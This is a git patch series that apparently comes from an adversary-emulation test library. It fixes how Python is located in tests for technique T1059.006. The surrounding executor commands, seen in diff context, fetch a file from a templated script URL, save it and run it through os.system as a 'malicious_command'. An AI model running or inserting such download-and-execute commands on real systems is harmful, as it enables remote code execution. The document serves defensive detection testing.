From e17fea0cb590e6d0f74e0388b3311784e941b0e0 Mon Sep 17 00:00:00 2001 From: Sebastian Reitenbach Date: Thu, 4 Nov 2021 12:57:05 +0100 Subject: [PATCH 1/2] fix T1059.006 tests 1-3 which_python is only set in the prereq_command, but not in the actual command to run the test, therefore it doesn't find python --- atomics/T1059.006/T1059.006.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml index 3c3714ec..e3e36fcd 100644 --- a/atomics/T1059.006/T1059.006.yaml +++ b/atomics/T1059.006/T1059.006.yaml @@ -33,6 +33,7 @@ atomic_tests: pip install requests executor: command: | + which_python=`which python` $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' name: sh cleanup_command: | @@ -74,6 +75,7 @@ atomic_tests: pip install requests executor: command: | + which_python=`which python` echo 'import requests' > #{python_script_name} echo 'import os' >> #{python_script_name} echo 'url = "#{script_url}"' >> #{python_script_name} @@ -130,6 +132,7 @@ atomic_tests: pip install requests executor: command: | + which_python=`which python` echo 'import requests' > #{python_script_name} echo 'import os' >> #{python_script_name} echo 'url = "#{script_url}"' >> #{python_script_name} From 39981d6ae97234c85c8ada8eff7907612956e130 Mon Sep 17 00:00:00 2001 From: Sebastian Reitenbach Date: Thu, 4 Nov 2021 14:21:47 +0100 Subject: [PATCH 2/2] This one is even better, no need for ln -s /usr/bin/python3 /usr/bin/python taken from T1003.007-2 --- atomics/T1059.006/T1059.006.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml index e3e36fcd..5a833829 100644 --- a/atomics/T1059.006/T1059.006.yaml +++ b/atomics/T1059.006/T1059.006.yaml @@ -27,13 +27,13 @@ atomic_tests: dependencies: - description: Verify if python is in the environment variable path and attempt to import requests library. prereq_command: | - which_python=`which python`; python -V + which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: | pip install requests executor: command: | - which_python=`which python` + which_python=$(which python || which python3 || which python2) $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' name: sh cleanup_command: | @@ -69,13 +69,13 @@ atomic_tests: - description: | Requires Python prereq_command: | - which_python=`which python`; python -V + which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: | pip install requests executor: command: | - which_python=`which python` + which_python=$(which python || which python3 || which python2) echo 'import requests' > #{python_script_name} echo 'import os' >> #{python_script_name} echo 'url = "#{script_url}"' >> #{python_script_name} @@ -126,13 +126,13 @@ atomic_tests: - description: | Requires Python prereq_command: | - which_python=`which python`; python -V + which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: | pip install requests executor: command: | - which_python=`which python` + which_python=$(which python || which python3 || which python2) echo 'import requests' > #{python_script_name} echo 'import os' >> #{python_script_name} echo 'url = "#{script_url}"' >> #{python_script_name}